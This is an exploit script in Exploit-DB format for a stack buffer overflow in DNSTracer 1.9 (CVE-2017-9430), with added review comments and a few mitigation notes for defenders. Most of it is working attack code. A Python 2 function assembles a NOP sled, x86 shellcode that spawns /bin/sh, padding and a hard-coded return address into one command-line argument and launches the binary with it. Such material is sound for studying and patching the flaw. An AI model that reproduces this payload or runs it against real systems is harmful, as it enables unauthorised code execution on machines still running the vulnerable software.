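# Exploit Title: DNSTracer 1.9 - Buffer Overflow
# Google Dork: [if applicable]
# Date: 03-08-2017
# Exploit Author: j0lama
# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php
# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz
# Version: 1.9
# Tested on: Ubuntu 12.04
# CVE : CVE-2017-9430
# Bug report: https://www.exploit-db.com/exploits/42115/
# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php
#
# Scope note: the overflow is reached through the name argument given on
# dnstracer's command line, so the exposure is any script or service that
# hands an unchecked, caller-supplied name to the binary. The banner printed
# by this script says it was tested against a build compiled without buffer
# overflow protection; behaviour on a hardened build is not shown here.
# Defenders: confirm the installed package carries a fix for CVE-2017-9430
# and bound the length of any name before invoking dnstracer.

# Proof of Concept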
import os
from subprocess import call
def run():
    """Run the CVE-2017-9430 proof of concept against a local ./dnstracer.

    Prints a banner, assembles one 1057-byte command-line argument
    (1006 + 23 + 24 + 4 bytes) and starts ``./dnstracer`` from the current
    directory with that argument via ``subprocess.call``.

    The banner states the PoC was tested against a binary compiled without
    buffer overflow protection, and the last four bytes of the argument are
    a hard-coded address. A fixed stack address only holds while the stack
    layout is predictable, so on a build with a stack protector or on a host
    with address randomisation the expected outcome is a crash, not a
    redirect -- TODO confirm against the linked analysis.

    Raises:
        OSError: re-raised after a message is printed when the binary cannot
            be started.
    """
    # NOTE(review): Python 2 source (print statements, byte-valued str).
    try:
        print "\nDNSTracer Stack-based Buffer Overflow"
        print "Author: j0lama"
        print "Tested with Dnstracer compile without buffer overflow protection"

        # Layout of the over-long argument, in order. Detection aid: a DNS
        # name is capped at 255 octets, so an argv entry of over a kilobyte
        # made mostly of 0x90 bytes is never a legitimate lookup target and
        # can be rejected by a length check in any wrapper around dnstracer.
        sled = "\x90"*1006
        payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
        padding = "A"*24
        return_address = "\x2f\xeb\xff\xbf"  # hard-coded, environment-specific

        # Total length is 1057 bytes.
        argument = "".join([sled, payload, padding, return_address])

        command = ["./dnstracer", argument]
        call(command)

    except OSError as err:
        # NOTE(review): os.errno is an undocumented alias that later Python
        # releases dropped; the errno module is the supported spelling.
        if err.errno == os.errno.ENOENT:
            message = "\nDnstracer not found!\n"
        else:
            message = "\nError executing exploit\n"
        print message
        # NOTE(review): the page lost its indentation; the re-raise is placed
        # at the except level (applies to both branches) -- confirm against
        # the original file.
        raise
# Script entry point: run the PoC once and report any failure generically.
if __name__ == '__main__':
    try:
        run()
    # Every exception, including the OSError that run() re-raises after
    # printing its own message, is reduced to this one line; the exception
    # detail and traceback are not shown.
    except Exception:
        print "Something went wrong"